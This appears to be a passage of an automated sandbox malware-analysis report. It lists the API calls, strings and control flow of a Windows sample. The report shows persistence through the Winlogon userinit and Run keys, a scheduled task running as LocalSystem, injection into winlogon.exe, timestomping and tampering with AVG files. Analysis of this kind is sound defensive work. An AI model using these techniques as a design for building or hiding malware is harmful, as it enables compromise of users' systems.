                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 241 401000-401011 242 401017-40101a 241->242 243 40113c-401141 241->243 242->243 244 401020-401022 242->244 244->243 245 401028-401044 CreateFileA 244->245 246 401139 245->246 247 40104a-401051 call 401e00 245->247 246->243 250 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 247->250 251 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 247->251 250->251 254 40106a-401089 GetSecurityDescriptorSacl 250->254 252 401105 251->252 253 4010f5-401103 SetEndOfFile 251->253 257 401108-401111 252->257 253->252 253->257 255 4010a0-4010a4 LocalFree 254->255 256 40108b-40109a SetNamedSecurityInfoA 254->256 255->251 256->255 258 401113-401120 GetHandleInformation 257->258 259 40112f-401136 257->259 258->259 260 401122-401126 258->260 260->259 261 401128-401129 CloseHandle 260->261 261->259
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 262 402930-40296f RegCreateKeyExA 263 402975-4029d9 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 262->263 264 4029fd-402a1e RegCreateKeyExA 262->264 265 4029e0-4029e5 263->265 266 402a20-402a22 264->266 267 402a44-402a4a 264->267 265->265 268 4029e7-4029fb 265->268 269 402a25-402a2a 266->269 270 402a4c-402a57 RegFlushKey RegCloseKey 267->270 271 402a5d-402a60 267->271 272 402a3e RegSetValueExA 268->272 269->269 273 402a2c-402a3d 269->273 270->271 272->267 273->272
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                                • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • userinit, xrefs: 00402A38
                                                                                                                                                                                                                • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                                • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                                • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 349 4014b0-401531 memset * 2 lstrcpynA CreateProcessA 350 401533-401543 349->350 351 40158f-401597 349->351 352 401545-40154e GetHandleInformation 350->352 353 40155d-401567 350->353 352->353 354 401550-401554 352->354 355 401581-40158c 353->355 356 401569-401572 GetHandleInformation 353->356 354->353 357 401556-401557 CloseHandle 354->357 356->355 358 401574-401578 356->358 357->353 358->355 359 40157a-40157b CloseHandle 358->359 359->355
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                                • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                control_flow_graph 360 401be0-401c0c CreateFileA 361 401c12-401c2e GetFileTime 360->361 362 401ca5-401caa 360->362 363 401c30-401c3d GetHandleInformation 361->363 364 401c4c-401c69 CreateFileA 361->364 363->364 365 401c3f-401c43 363->365 364->362 366 401c6b-401c87 SetFileTime 364->366 365->364 367 401c45-401c46 CloseHandle 365->367 366->362 368 401c89-401c96 GetHandleInformation 366->368 367->364 368->362 369 401c98-401c9c 368->369 369->362 370 401c9e-401c9f CloseHandle 369->370 370->362
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                                • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                                • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                                • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFolderMovePath
                                                                                                                                                                                                                • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                • String ID: v-@
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                                • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                  • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                  • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                  • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 004036CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 00403717
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,7702DB30), ref: 0040371E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • 00-->, xrefs: 0040383F
                                                                                                                                                                                                                • task%d, xrefs: 0040365C
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                                • <Actions , xrefs: 0040380A
                                                                                                                                                                                                                • p=5w, xrefs: 0040394B
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=5w$task%d
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 3422789474-2746444292
                                                                                                                                                                                                                • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                  • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7702DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                                • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                                • API String ID: 3542510048-3024904723
                                                                                                                                                                                                                • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                                • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,75570F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                                • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                                • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                                • String ID: .dll$kernel
                                                                                                                                                                                                                • API String ID: 2979424695-2375045364
                                                                                                                                                                                                                • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
